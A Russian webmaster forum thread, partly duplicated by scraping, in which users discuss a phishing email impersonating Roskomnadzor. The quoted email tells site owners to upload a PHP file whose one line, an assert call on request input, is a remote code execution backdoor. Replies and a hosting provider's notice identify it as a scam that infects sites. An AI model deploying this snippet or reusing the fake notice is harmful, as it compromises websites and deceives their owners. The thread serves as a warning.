Хакеры балуются, или что?

Hob · 27.08.2015, 09:32

Получил на почту письмо, якобы от Роскомнадзора. Сайт более 3 тыс. посещений. Ленивые хакеры? Сайт убрал, следуя традициям форума. Отправитель писма - zapret-info@roskomnadzor.org
Что думаете, коллеги?
Само письмо:

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени [SITE] в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2*1618/2015, Ваш сайт [SITE] был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени [SITE], Вам необходимо:

1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени [SITE]*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: [SITE]/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени [SITE], следую инструкции указанной выше, то Ваш сайт [SITE] будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

-------------------
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.

Добавлено через 3 минуты
Правильный сайт роскомнадзора - rkn.gov.ru/

А первый позыв был, признаюсь, - разместить грёбаный файлик.

SergejF · 27.08.2015, 09:39

Это не хакеры, это разводители.

Hob · 27.08.2015, 09:44

Да, спасибо. В запросе по почтовому ящику уже находится много обсуждений на эту тему - такой, оказывается, прошел массовый поиск лопухов.

viktori2205 · 27.08.2015, 17:03

от хостера сегодня получмл:

Сегодня участились случаи взлома сайтов пользователь.
На контактный емайл приходят сообщения якобы от Роскомнадзора с просьбой разместить у себя файл reestr/reestr-id128032.php, содержащий в себе вредоносный код.
После размещения данного файла сайт заражается.

Ссылка на статью: http://habrahabr.ru/post/265513

Просьба игнорировать подобное письмо, а если Вы уже разместили данный файл, то незамедлительно удалите его.
Если требуется помощь в поиске вредоносных файлов или необходимы логи запросов к сайту, Вы всегда можете обратиться в службу поддержки LTD BeGet.

Vladooo · 27.08.2015, 23:09

Редирект им поставил, пусть радуются.

Andrej · 29.08.2015, 01:05

Цитата:

Сообщение от Vladooo

Редирект им поставил, пусть радуются.

на Роскомнадзор ?

27.08.2015, 09:32	#1
Hob Специалист Регистрация: 23.06.2010 Адрес: 101-й километр Сообщений: 200 Вес репутации: 182	Хакеры балуются, или что? Получил на почту письмо, якобы от Роскомнадзора. Сайт более 3 тыс. посещений. Ленивые хакеры? Сайт убрал, следуя традициям форума. Отправитель писма - zapret-info@roskomnadzor.org Что думаете, коллеги? Само письмо: Здравствуйте. Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени [SITE] в сети «Интернет». В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 21618/2015, Ваш сайт [SITE] был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет». Для идентификации Вас, как администратора доменного имени [SITE], Вам необходимо: 1. Cоздать в корневой директории Вашего сайта папку reestr 2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст: < ?php /Подтверждение доменного имени [SITE]/ assert(stripslashes($_REQUEST[roskomnadzor])); ?> В < ?php необходимо убрать пробел между < и ?php Путь до файла на Вашем сайте должен получиться следующий: [SITE]/reestr/reestr-id128032.php Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени [SITE], следую инструкции указанной выше, то Ваш сайт [SITE] будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации. ------------------- С уважением, ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ. Добавлено через 3 минуты Правильный сайт роскомнадзора - rkn.gov.ru/ А первый позыв был, признаюсь, - разместить грёбаный файлик. __________________ Лайфхак - оптимизация жизни Последний раз редактировалось Hob; 27.08.2015 в 09:32. Причина: Добавлено сообщение

27.08.2015, 09:44	#3
Hob Специалист Регистрация: 23.06.2010 Адрес: 101-й километр Сообщений: 200 Вес репутации: 182	Да, спасибо. В запросе по почтовому ящику уже находится много обсуждений на эту тему - такой, оказывается, прошел массовый поиск лопухов. __________________ Лайфхак - оптимизация жизни

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Детишки опять балуются.	Smerch-M	Курилка	5	10.05.2011 18:56
Хакеры атакуют	Dimaksss	Курилка	18	09.12.2010 17:34
А кто такие хакеры то?	Никола	Курилка	34	27.07.2010 20:03
хакеры?или я зря парюсь?	Drakon	Контекстные ссылки и все, что с ними связано	14	26.06.2010 11:18

27.08.2015, 09:39	#2
SergejF Эксперт Регистрация: 17.02.2008 Адрес: Донецк, ДНР Сообщений: 8,880 Вес репутации: 502	Это не хакеры, это разводители.

27.08.2015, 17:03	#4
viktori2205 Новичок Регистрация: 04.03.2011 Сообщений: 22 Вес репутации: 0	от хостера сегодня получмл: Сегодня участились случаи взлома сайтов пользователь. На контактный емайл приходят сообщения якобы от Роскомнадзора с просьбой разместить у себя файл reestr/reestr-id128032.php, содержащий в себе вредоносный код. После размещения данного файла сайт заражается. Ссылка на статью: http://habrahabr.ru/post/265513 Просьба игнорировать подобное письмо, а если Вы уже разместили данный файл, то незамедлительно удалите его. Если требуется помощь в поиске вредоносных файлов или необходимы логи запросов к сайту, Вы всегда можете обратиться в службу поддержки LTD BeGet.

27.08.2015, 23:09	#5
Vladooo Новичок Регистрация: 19.05.2010 Сообщений: 36 Вес репутации: 170	Редирект им поставил, пусть радуются.

Опции темы
Версия для печати Отправить по электронной почте